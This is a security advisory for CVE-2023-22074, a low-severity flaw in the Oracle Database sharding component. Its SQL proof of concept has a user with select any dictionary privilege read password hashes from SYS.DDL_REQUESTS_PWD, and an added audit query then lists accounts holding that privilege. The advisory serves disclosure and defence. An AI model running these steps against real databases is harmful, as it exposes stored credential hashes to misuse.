Title: CVE-2023-22074 – Oracle database password hash exposure in sharding component  
Product: Database  
Manufacturer: Oracle  
Affected Version(s): 19c, 21c [19.3-19.20 and 21.3-21.11]  
Tested Version(s): 19c  
Risk Level: Low  
Solution Status: Fixed  
CVE Reference: CVE-2023-22074  
Base Score: 2.4   
Author of Advisory: Emad Al-Mousa  
Vulnerability Details:  
Vulnerability in the Oracle Database Sharding component of Oracle Database Server. An attacker who compromises an account with the create session and select any dictionary privileges can view password hashes stored in a system table that is part of the sharding component setup.  
Proof of Concept (PoC):  
I will create an account called “jim” in the pluggable database ORCLPDB1 and grant it the create session and select any dictionary privileges:  
SQL> alter session set container=ORCLPDB1;  
Session altered.  
SQL> create user jim identified by jim123;  
User created.  
SQL> grant create session,select any dictionary to jim;  
Grant succeeded.  
I will now connect using the database account “jim”, which is able to view the password hashes in the system table DDL_REQUESTS_PWD used by the database sharding component:  
sqlplus "jim/jim123"@ORCLPDB1  
SQL> show user  
USER is "JIM"  
SQL> select * from SYS.DDL_REQUESTS_PWD;  
---------- ----------  
123 445
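
The precondition described above is an account holding select any dictionary, so a privilege review is the natural check. The following query is an added example, not part of the original advisory: it assumes a DBA session inside the PDB and uses the standard DBA_SYS_PRIVS, DBA_ROLE_PRIVS and DBA_USERS views to list non-Oracle-maintained accounts that hold the privilege directly or through a chain of roles.

```sql
-- Added example (not from the advisory). Run as a DBA in each PDB to review.
-- Lists non-Oracle-maintained accounts that hold SELECT ANY DICTIONARY,
-- either through a direct grant or through a chain of granted roles.
WITH direct_grants AS (
    -- Users and roles granted the system privilege directly.
    SELECT grantee,
           'direct grant' AS granted_via
    FROM   dba_sys_privs
    WHERE  privilege = 'SELECT ANY DICTIONARY'
),
role_grants AS (
    -- Walk role grants outward from every role that holds the privilege.
    -- The path reads from the role holding the privilege to the role
    -- that was finally granted to the listed grantee.
    SELECT grantee,
           'role path' || SYS_CONNECT_BY_PATH(granted_role, ' -> ') AS granted_via
    FROM   dba_role_privs
    START WITH granted_role IN (SELECT grantee FROM direct_grants)
    CONNECT BY NOCYCLE PRIOR grantee = granted_role
)
SELECT u.username,
       u.account_status,
       g.granted_via
FROM   (SELECT grantee, granted_via FROM direct_grants
        UNION ALL
        SELECT grantee, granted_via FROM role_grants) g
JOIN   dba_users u
       ON u.username = g.grantee          -- keeps users, drops intermediate roles
WHERE  u.oracle_maintained = 'N'          -- skip SYS, SYSTEM and other built-in accounts
ORDER  BY u.username, g.granted_via;
```

In the PoC environment above, this would return JIM with "direct grant"; any account listed that does not need dictionary-wide read access is a candidate for having the privilege revoked.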